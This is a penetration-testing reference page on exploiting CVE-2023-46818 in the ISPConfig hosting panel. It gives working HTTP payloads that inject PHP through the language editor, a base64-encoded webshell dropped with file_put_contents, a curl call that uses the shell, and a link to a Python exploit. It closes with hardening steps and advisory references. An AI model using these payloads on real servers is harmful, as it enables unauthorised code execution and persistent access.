# ISPConfig

{{#include ../../banners/hacktricks-training.md}}

## Overview

ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.

Key default paths:
- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).

Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:

```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```

## Language editor PHP code injection (CVE-2023-46818)

- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
- Preconditions:
  - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
  - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

### Manual exploitation flow

1) Open/create a language file to obtain CSRF tokens

Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.

2) Inject PHP via records[] and save

Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:

```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```

Out-of-band test (observe ICMP):

```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```

3) Write files and drop a webshell

Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):

```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```

Then write a simple webshell using base64 to avoid bad characters in the POST body:

```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```

Use it:

```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```

If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.

### Python PoC

A ready-to-use exploit automates token handling and payload delivery:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)

Example run:

```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```

### Hardening

- Upgrade to 3.2.11p1 or later
- Disable the language editor unless strictly needed:

```
admin_allow_langedit=no
```

- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
- Enforce strong authentication for the built-in `admin` account

## References

- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)

{{#include ../../banners/hacktricks-training.md}}